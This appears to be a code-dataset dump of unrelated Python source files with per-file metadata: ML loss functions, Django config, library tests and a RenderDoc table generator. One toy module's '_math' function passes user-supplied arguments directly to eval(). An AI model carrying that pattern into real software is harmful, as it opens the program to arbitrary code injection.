| 22.160305 | 71 | 0.756459 | 361 | 2,903 | 5.897507 | 0.271468 | 0.084547 | 0.133866 | 0.146548 | 0.335838 | 0.205261 | 0.164396 | 0.092062 | 0.052607 | 0.052607 | 0 | 0.00476 | 0.131588 | 2,903 | 131 | 72 | 22.160305 | 0.839746 | 0.050293 | 0 | 0.150685 | 0 | 0 | 0.166485 | 0.075245 | 0 | 0 | 0 | 0 | 0 | 1 | 0.232877 | false | 0 | 0.09589 | 0.164384 | 0.60274 | 0.013699 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
6a9507aa112d34b7c202f8a599cac3b4461f9c4d | 432 | py | Python | supervised_learning/0x02-tensorflow/4-calculate_loss.py | cbarros7/holbertonschool-machine_learning | 1edb4c253441f6319b86c9c590d1e7dd3fc32bf4 | [
"MIT"
] | 1 | 2022-03-09T19:12:22.000Z | 2022-03-09T19:12:22.000Z | supervised_learning/0x02-tensorflow/4-calculate_loss.py | cbarros7/holbertonschool-machine_learning | 1edb4c253441f6319b86c9c590d1e7dd3fc32bf4 | [
"MIT"
] | null | null | null | supervised_learning/0x02-tensorflow/4-calculate_loss.py | cbarros7/holbertonschool-machine_learning | 1edb4c253441f6319b86c9c590d1e7dd3fc32bf4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""
Loss
"""
import tensorflow as tf
def calculate_loss(y, y_pred):
"""calculates the softmax cross-entropy loss of a prediction
Args:
y is a placeholder for the labels of the input data
y_pred is a tensor containing the network’s predictions
Returns:
a tensor containing the loss of the prediction"""
return tf.losses.softmax_cross_entropy(y, y_pred, weights=1.0)
| 24 | 66 | 0.699074 | 67 | 432 | 4.41791 | 0.58209 | 0.050676 | 0.040541 | 0.135135 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008955 | 0.224537 | 432 | 17 | 67 | 25.411765 | 0.874627 | 0.62037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
6a983018392f7b604bb79b806fd493ff1980d3f7 | 979 | py | Python | Examples/FanFicFare-master/webservice/settings.py | TomNorrie/ePubify | 89c89bd22cafdea787f3131ca9cdc8336209ed6c | [
"MIT"
] | 1 | 2019-06-13T11:20:33.000Z | 2019-06-13T11:20:33.000Z | webservice/settings.py | davidferguson/FanFicUpload | dcc3010b9c35c6d0e479cfc2aa07d951d280d9b2 | [
"Apache-2.0"
] | null | null | null | webservice/settings.py | davidferguson/FanFicUpload | dcc3010b9c35c6d0e479cfc2aa07d951d280d9b2 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2011 Fanficdownloader team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
## Just to shut up the appengine warning about "You are using the
## default Django version (0.96). The default Django version will
## change in an App Engine release in the near future. Please call
## use_library() to explicitly select a Django version. For more
## information see
## http://code.google.com/appengine/docs/python/tools/libraries.html#Django"
pass
| 37.653846 | 76 | 0.75383 | 151 | 979 | 4.880795 | 0.662252 | 0.081411 | 0.035278 | 0.043419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014652 | 0.163432 | 979 | 25 | 77 | 39.16 | 0.885226 | 0.940756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
6a9e769f51f9e8297479024097d8df5813e18c2a | 1,265 | py | Python | tests/st/ops/custom_ops_tbe/cus_square.py | TommyLike/mindspore | 401dabb786a9097d6dd84f391657d266b04e9a37 | [
"Apache-2.0"
] | 1 | 2020-05-23T07:08:46.000Z | 2020-05-23T07:08:46.000Z | tests/st/ops/custom_ops_tbe/cus_square.py | liyong126/mindspore | 930a1fb0a8fa9432025442c4f4732058bb7af592 | [
"Apache-2.0"
] | 7 | 2020-03-30T08:31:56.000Z | 2020-04-01T09:54:39.000Z | tests/st/ops/custom_ops_tbe/cus_square.py | liyong126/mindspore | 930a1fb0a8fa9432025442c4f4732058bb7af592 | [
"Apache-2.0"
] | 1 | 2020-03-30T17:07:43.000Z | 2020-03-30T17:07:43.000Z | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
from mindspore.ops import prim_attr_register, PrimitiveWithInfer
from mindspore import Tensor
# y = x^2
class CusSquare(PrimitiveWithInfer):
"""CusSquare definition"""
@prim_attr_register
def __init__(self):
"""init CusSquare"""
self.init_prim_io_names(inputs=['x'], outputs=['y'])
from .square_impl import CusSquare
def vm_impl(self, x):
x = x.asnumpy()
return Tensor(np.multiply(x, x))
def infer_shape(self, data_shape):
return data_shape
def infer_dtype(self, data_dtype):
return data_dtype
| 33.289474 | 78 | 0.674308 | 170 | 1,265 | 4.905882 | 0.576471 | 0.071942 | 0.031175 | 0.038369 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008738 | 0.185771 | 1,265 | 37 | 79 | 34.189189 | 0.800971 | 0.539921 | 0 | 0 | 0 | 0 | 0.003591 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.266667 | false | 0 | 0.266667 | 0.133333 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
6a9ec478f0e5d22a5d3c508337a4ba92ff714277 | 327 | py | Python | modules/std/main.py | actiniumn404/SICL | 218b832fafd7613051a9b29b10b3223e4f7b102a | [
"MIT"
] | null | null | null | modules/std/main.py | actiniumn404/SICL | 218b832fafd7613051a9b29b10b3223e4f7b102a | [
"MIT"
] | null | null | null | modules/std/main.py | actiniumn404/SICL | 218b832fafd7613051a9b29b10b3223e4f7b102a | [
"MIT"
] | null | null | null | def setup(func: dict):
func["print"] = _print
func["input"] = _input
func["math"] = _math
def _print(*args):
print(*args)
def _input(prompt):
return input(prompt)
def _math(*args):
return eval(" ".join([str(x) for x in args]).replace("^", "**")) # I'll replace this with my 50 line algorithm later
| 21.8 | 121 | 0.611621 | 47 | 327 | 4.12766 | 0.553191 | 0.092784 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007722 | 0.207951 | 327 | 14 | 122 | 23.357143 | 0.741313 | 0.149847 | 0 | 0 | 0 | 0 | 0.065217 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.6 | 0.3 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
6aa69342604cadfab3123916b37402aa32839a23 | 84 | py | Python | notto/notto/settings/production.py | renatoliveira/notto | da0fb1d71aa1fc16c97f2a444380db17f7d0ef4c | [
"MIT"
] | 28 | 2017-12-05T12:14:27.000Z | 2021-11-02T02:27:16.000Z | notto/notto/settings/production.py | renatoliveira/notto | da0fb1d71aa1fc16c97f2a444380db17f7d0ef4c | [
"MIT"
] | 29 | 2017-12-05T11:55:21.000Z | 2018-07-23T17:00:47.000Z | notto/notto/settings/production.py | renatoliveira/notto | da0fb1d71aa1fc16c97f2a444380db17f7d0ef4c | [
"MIT"
] | 15 | 2017-12-07T09:17:18.000Z | 2020-11-24T21:15:04.000Z | """
Production Settings
"""
from .base import * # noqa: F401, F403
DEBUG = False
| 10.5 | 39 | 0.642857 | 10 | 84 | 5.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 0.214286 | 84 | 7 | 40 | 12 | 0.727273 | 0.440476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
6aacbd62e5c3fe535809573322beb9b24d099b31 | 293 | py | Python | helpers/connected_android_devices.py | qbalsdon/horai | 4188dc1ec2a0bf69475fa6216ec773e6f3a26c5b | [
"MIT"
] | null | null | null | helpers/connected_android_devices.py | qbalsdon/horai | 4188dc1ec2a0bf69475fa6216ec773e6f3a26c5b | [
"MIT"
] | null | null | null | helpers/connected_android_devices.py | qbalsdon/horai | 4188dc1ec2a0bf69475fa6216ec773e6f3a26c5b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import subprocess
"""
Helper module to fetch all connected Android devices
"""
def get_device_list():
return subprocess.run(["adb","devices"], capture_output=True).stdout.decode().strip().split('\n', 1)[-1]
if __name__ == "__main__":
print(get_device_list())
| 22.538462 | 108 | 0.699659 | 40 | 293 | 4.8 | 0.85 | 0.09375 | 0.135417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011673 | 0.122867 | 293 | 12 | 109 | 24.416667 | 0.735409 | 0.071672 | 0 | 0 | 0 | 0 | 0.094787 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.2 | 0.2 | 0.6 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
6ae294ca172627ddf5cbbda9d13836779c073633 | 892 | py | Python | carrara/archivi/migrations/0005_auto_20210714_1926.py | cxc61cxc/django_prove | 9df58be73ef51e13287bfbd1b8623f3f39b8a224 | [
"MIT"
] | null | null | null | carrara/archivi/migrations/0005_auto_20210714_1926.py | cxc61cxc/django_prove | 9df58be73ef51e13287bfbd1b8623f3f39b8a224 | [
"MIT"
] | null | null | null | carrara/archivi/migrations/0005_auto_20210714_1926.py | cxc61cxc/django_prove | 9df58be73ef51e13287bfbd1b8623f3f39b8a224 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.4 on 2021-07-14 19:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('archivi', '0004_auto_20210714_1233'),
]
operations = [
migrations.AlterField(
model_name='pratica',
name='d_nasc',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='pratica',
name='data_atto',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='pratica',
name='data_ce',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='pratica',
name='data_prot_gen',
field=models.DateField(blank=True, null=True),
),
]
| 26.235294 | 58 | 0.560538 | 90 | 892 | 5.422222 | 0.466667 | 0.163934 | 0.204918 | 0.237705 | 0.655738 | 0.655738 | 0.57377 | 0.497951 | 0.497951 | 0.497951 | 0 | 0.051155 | 0.320628 | 892 | 33 | 59 | 27.030303 | 0.754125 | 0.050448 | 0 | 0.592593 | 1 | 0 | 0.110059 | 0.027219 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a9ce91b89bab04ba783534e7471e8061ff5c17a | 98 | py | Python | tests/experiments/initial.py | jonathanchukinas/fuzzytable | 3d574047c3a8b0c28ab6a00436526c92ca1ea6d2 | [
"MIT"
] | 1 | 2019-11-22T21:16:34.000Z | 2019-11-22T21:16:34.000Z | tests/experiments/initial.py | jonathanchukinas/fuzzytable | 3d574047c3a8b0c28ab6a00436526c92ca1ea6d2 | [
"MIT"
] | 3 | 2019-11-22T13:16:44.000Z | 2019-11-26T19:49:39.000Z | tests/experiments/initial.py | jonathanchukinas/fuzzytable | 3d574047c3a8b0c28ab6a00436526c92ca1ea6d2 | [
"MIT"
] | null | null | null |
class initial(object):
pass
INITIAL = initial()
another = INITIAL
print(another is INITIAL) | 12.25 | 25 | 0.72449 | 12 | 98 | 5.916667 | 0.583333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183673 | 98 | 8 | 25 | 12.25 | 0.8875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.2 | 0 | 0 | 0.2 | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
0aa24326b705a3e7d9dbf4349d42b9e13b875cf2 | 156 | py | Python | library/test/test_compiler/sbs_code_tests/03_set_unpack_2.py | creativemindplus/skybison | d1740e08d8de85a0a56b650675717da67de171a0 | [
"CNRI-Python-GPL-Compatible"
] | 278 | 2021-08-31T00:46:51.000Z | 2022-02-13T19:43:28.000Z | library/test/test_compiler/sbs_code_tests/03_set_unpack_2.py | creativemindplus/skybison | d1740e08d8de85a0a56b650675717da67de171a0 | [
"CNRI-Python-GPL-Compatible"
] | 9 | 2021-11-05T22:28:43.000Z | 2021-11-23T08:39:04.000Z | library/test/test_compiler/sbs_code_tests/03_set_unpack_2.py | tekknolagi/skybison | bea8fc2af0a70e7203b4c19f36c14a745512a335 | [
"CNRI-Python-GPL-Compatible"
] | 12 | 2021-08-31T07:49:54.000Z | 2021-10-08T01:09:01.000Z | # Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
{*[1,2,3], *[4,5,6]}
# EXPECTED:
[
...,
BUILD_SET_UNPACK(2),
...
]
| 17.333333 | 76 | 0.551282 | 22 | 156 | 3.818182 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.192308 | 156 | 8 | 77 | 19.5 | 0.611111 | 0.538462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0ae149f3afa47edc55b882648dfe1fb917395814 | 1,462 | py | Python | tests/test_separate_words.py | fabaff/humps | 5e39901ed4f3053eb12557b2ff356160bcd6b635 | [
"Unlicense"
] | 2 | 2018-10-15T03:56:08.000Z | 2018-10-15T05:04:40.000Z | tests/test_separate_words.py | nficano/pyhumps | 5e39901ed4f3053eb12557b2ff356160bcd6b635 | [
"Unlicense"
] | 27 | 2021-11-11T10:27:26.000Z | 2022-03-31T10:31:18.000Z | tests/test_separate_words.py | nficano/pyhumps | 5e39901ed4f3053eb12557b2ff356160bcd6b635 | [
"Unlicense"
] | null | null | null | """
Test the utility for splitting words.
"""
import pytest
from humps.main import _separate_words
@pytest.mark.parametrize(
"input_str, expected_output",
[
# Pascals.
("HelloWorld", "Hello_World"),
("_HelloWorld", "_Hello_World"),
("__HelloWorld", "__Hello_World"),
("HelloWorld_", "Hello_World_"),
("HelloWorld__", "Hello_World__"),
# Camels
("helloWorld", "hello_World"),
("_helloWorld", "_hello_World"),
("__helloWorld", "__hello_World"),
("helloWorld_", "hello_World_"),
("helloWorld__", "hello_World__"),
# Snakes
("hello_world", "hello_world"),
("_hello_world", "_hello_world"),
("__hello_world", "__hello_world"),
("hello_world_", "hello_world_"),
("hello_world__", "hello_world__"),
# Fixes issue #128
("whatever_hi", "whatever_hi"),
("whatever_10", "whatever_10"),
# Fixes issue #127
("sizeX", "size_X"),
# Fixes issue #168
("aB", "a_B"),
# Fixed issue #201. 2021-10-12
("testNTest", "test_N_Test"),
],
)
def test_separate_words(input_str, expected_output):
"""
:param input_str: String that will be transformed.
:param expected_output: The expected transformation.
"""
output = _separate_words(input_str)
assert output == expected_output, "{} != {}".format(
output, expected_output
)
| 29.24 | 56 | 0.583447 | 142 | 1,462 | 5.450704 | 0.380282 | 0.258398 | 0.258398 | 0.232558 | 0.387597 | 0.387597 | 0.387597 | 0.387597 | 0.387597 | 0.387597 | 0 | 0.022181 | 0.259918 | 1,462 | 49 | 57 | 29.836735 | 0.693161 | 0.164843 | 0 | 0 | 0 | 0 | 0.396959 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 1 | 0.03125 | false | 0 | 0.0625 | 0 | 0.09375 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0aed53a3826fb72babf156c9a1149b4af3eec420 | 263 | py | Python | server/__init__.py | FrederichRiver/neutrino3 | c16c6ea824999c012252d0e281473a6ab13fd38e | [
"BSD-3-Clause"
] | 1 | 2021-07-12T11:20:58.000Z | 2021-07-12T11:20:58.000Z | server/__init__.py | FrederichRiver/neutrino3 | c16c6ea824999c012252d0e281473a6ab13fd38e | [
"BSD-3-Clause"
] | null | null | null | server/__init__.py | FrederichRiver/neutrino3 | c16c6ea824999c012252d0e281473a6ab13fd38e | [
"BSD-3-Clause"
] | null | null | null | __all__ = ['server_model', 'client_model']
import time
class MsgFrame(object):
def __init__(self, text: str) -> None:
self.ts = time.time()
self.msg = text
self.FLAG = 1
def __str__(self):
return f"{self.ts}: {self.msg}" | 21.916667 | 42 | 0.585551 | 35 | 263 | 4 | 0.6 | 0.085714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005181 | 0.26616 | 263 | 12 | 43 | 21.916667 | 0.720207 | 0 | 0 | 0 | 0 | 0 | 0.170455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0.111111 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
0afc8d39415232f0586aef3f8d77030e84c58cad | 2,702 | py | Python | losses.py | alexanderfroeber/cyclegan-1 | 4a807fb3c894bdcf7ec2395fb8a4c462dafe5e16 | [
"MIT"
] | 246 | 2017-07-18T17:07:21.000Z | 2021-11-23T03:11:22.000Z | losses.py | alexanderfroeber/cyclegan-1 | 4a807fb3c894bdcf7ec2395fb8a4c462dafe5e16 | [
"MIT"
] | 8 | 2017-07-18T17:30:35.000Z | 2021-03-19T14:37:22.000Z | losses.py | alexanderfroeber/cyclegan-1 | 4a807fb3c894bdcf7ec2395fb8a4c462dafe5e16 | [
"MIT"
] | 138 | 2017-07-19T12:59:43.000Z | 2022-01-28T03:44:05.000Z | """Contains losses used for performing image-to-image domain adaptation."""
import tensorflow as tf
def cycle_consistency_loss(real_images, generated_images):
"""Compute the cycle consistency loss.
The cycle consistency loss is defined as the sum of the L1 distances
between the real images from each domain and their generated (fake)
counterparts.
This definition is derived from Equation 2 in:
Unpaired Image-to-Image Translation using Cycle-Consistent Adversarial
Networks.
Jun-Yan Zhu, Taesung Park, Phillip Isola, Alexei A. Efros.
Args:
real_images: A batch of images from domain X, a `Tensor` of shape
[batch_size, height, width, channels].
generated_images: A batch of generated images made to look like they
came from domain X, a `Tensor` of shape
[batch_size, height, width, channels].
Returns:
The cycle consistency loss.
"""
return tf.reduce_mean(tf.abs(real_images - generated_images))
def lsgan_loss_generator(prob_fake_is_real):
"""Computes the LS-GAN loss as minimized by the generator.
Rather than compute the negative loglikelihood, a least-squares loss is
used to optimize the discriminators as per Equation 2 in:
Least Squares Generative Adversarial Networks
Xudong Mao, Qing Li, Haoran Xie, Raymond Y.K. Lau, Zhen Wang, and
Stephen Paul Smolley.
https://arxiv.org/pdf/1611.04076.pdf
Args:
prob_fake_is_real: The discriminator's estimate that generated images
made to look like real images are real.
Returns:
The total LS-GAN loss.
"""
return tf.reduce_mean(tf.squared_difference(prob_fake_is_real, 1))
def lsgan_loss_discriminator(prob_real_is_real, prob_fake_is_real):
"""Computes the LS-GAN loss as minimized by the discriminator.
Rather than compute the negative loglikelihood, a least-squares loss is
used to optimize the discriminators as per Equation 2 in:
Least Squares Generative Adversarial Networks
Xudong Mao, Qing Li, Haoran Xie, Raymond Y.K. Lau, Zhen Wang, and
Stephen Paul Smolley.
https://arxiv.org/pdf/1611.04076.pdf
Args:
prob_real_is_real: The discriminator's estimate that images actually
drawn from the real domain are in fact real.
prob_fake_is_real: The discriminator's estimate that generated images
made to look like real images are real.
Returns:
The total LS-GAN loss.
"""
return (tf.reduce_mean(tf.squared_difference(prob_real_is_real, 1)) +
tf.reduce_mean(tf.squared_difference(prob_fake_is_real, 0))) * 0.5
| 37.527778 | 78 | 0.700962 | 386 | 2,702 | 4.782383 | 0.334197 | 0.029252 | 0.032503 | 0.045504 | 0.627844 | 0.62351 | 0.5948 | 0.57584 | 0.57584 | 0.57584 | 0 | 0.013094 | 0.236862 | 2,702 | 71 | 79 | 38.056338 | 0.882153 | 0.740933 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0 | 0.125 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
0afe53c5d2d4b902b48213df13e9f8e32ee54607 | 10,206 | py | Python | renderdoc/driver/gl/gen_dispatch_table.py | gary-sweet/renderdoc | 9721150aa9bd4afccaf3649037bc914e6f37ae4e | [
"MIT"
] | 20 | 2020-04-08T18:11:18.000Z | 2022-03-29T10:47:30.000Z | renderdoc/driver/gl/gen_dispatch_table.py | gary-sweet/renderdoc | 9721150aa9bd4afccaf3649037bc914e6f37ae4e | [
"MIT"
] | 3 | 2020-12-30T05:16:38.000Z | 2021-03-05T09:50:41.000Z | renderdoc/driver/gl/gen_dispatch_table.py | gary-sweet/renderdoc | 9721150aa9bd4afccaf3649037bc914e6f37ae4e | [
"MIT"
] | 8 | 2020-04-08T18:14:48.000Z | 2022-01-29T10:47:54.000Z | #!/usr/bin/env python3
import os
import io
import sys
import re
import argparse
parser = argparse.ArgumentParser(description='Generate macros for handling GL dispatch table.')
parser.add_argument('-m', '--maxparam', type=int, default=17,
help='The maximum number of parameters to generate')
parsed_args = parser.parse_args()
# on msys, print crlf output
if sys.platform == 'msys':
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, newline="\r\n")
# Get the file, relative to this script's location (same directory)
# that way we're not sensitive to CWD
pathname = os.path.abspath(os.path.dirname(sys.argv[0])) + os.path.sep
# Finding definitions in the dispatch table header
def_regex = re.compile('(?P<typedef>PFN.*PROC) (?P<name>.*);(\s*\/\/ aliases +)?(?P<aliases>[a-zA-Z0-9_ ,]*)?')
# Finding a function definition in the official headers
func_regex = re.compile('(WINAPI|APIENTRY) (w?gl[A-Za-z_0-9]+)\s?\(')
# Finding a typedef in the official headers
typedef_regex = re.compile('^typedef (?P<return>[A-Za-z_0-9\s*]+)\([A-Z_ *]* (?P<typedef>PFN[A-Z_0-9]+)\) \((?P<args>.*)\);')
# Replacing float arg[2] with float *arg in definitions
array_regex = re.compile('([A-Za-z_][a-zA-Z_0-9]*) ([A-Za-z_][a-zA-Z_0-9]*)\[[0-9]*\]')
# Split an argument definition up by extracting the last full word
argsplit_regex = re.compile('(.*)([\*\s])([a-zA-Z0-9]+)')
# List of hooks to define, will be filled out when processing the dispatch table header
hooks = []
# A dict of typedef information
# Elements contain:
# 'used': True if it's used by our definitions or not - False if unsupported
# 'function': The name of the function defined with this typedef.
# e.g. typedefs['PFNGLBEGINPROC']['function'] = 'glBegin'.
# 'return': The return type
# 'args': The list of arguments with types and arguments separated
# e.g. [["int", "a"], ["float", "b"]]
typedefs = {}
# Open the dispatch table file
with open(pathname + "gl_dispatch_table.h", 'r') as fp:
# For each line that defines a dispatch pointer, process it
for func in [line.strip() for line in fp.readlines() if "PFN" in line]:
match = def_regex.search(func)
# All lines that contain a dispatch pointer should match the regex
if not match:
raise RuntimeError("Badly formed definition: {0}".format(func))
# Split the list of aliases
aliases = match.group('aliases')
aliases = re.split(', *', aliases) if aliases != '' else []
# Add the hook
hook = { 'typedef': match.group('typedef'), 'name': match.group('name'), 'aliases': aliases }
hooks.append(hook)
# Add the typedefs for the base function and all aliases as used
typedefs['PFN{0}PROC'.format(hook['name'].upper())] = {'used': True}
for a in aliases:
typedefs['PFN{0}PROC'.format(a.upper())] = {'used': True}
# Read all the official headers into a single string
official_headers = []
for header in ['glcorearb.h', 'glext.h', 'gl32.h', 'glesext.h', 'wglext.h', 'legacygl.h']:
with open(pathname + 'official' + os.path.sep + header, 'r') as fp:
official_headers += fp.readlines()
# Look for function definitions and add typedef function names.
for line in official_headers:
match = func_regex.search(line)
if match:
typedef = 'PFN{0}PROC'.format(match.group(2).upper())
if typedef not in typedefs:
typedefs[typedef] = {'used': False}
typedefs[typedef]['function'] = match.group(2)
# Now find typedefs and add return type/argument data
for line in official_headers:
match = typedef_regex.search(line)
if match:
typedef = match.group('typedef')
typedefs[typedef]['return'] = match.group('return').strip()
args = match.group('args')
if args == '' or args == 'void':
args = []
else:
# Replace array arguments with pointers - see glPathGlyphIndexRangeNV
args = array_regex.sub(r"\1 *\2", match.group('args'))
# Create an array with each parameter as an element
args = [a.strip() for a in args.split(',')]
# Split up each argument
args = [re.split(' *, *', argsplit_regex.sub(r"\1\2,\3", a)) for a in args]
typedefs[typedef]['args'] = args
# Print the file, starting with a template header
print('''
/******************************************************************************
* The MIT License (MIT)
*
* Copyright (c) 2018 Baldur Karlsson
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
******************************************************************************/
#pragma once
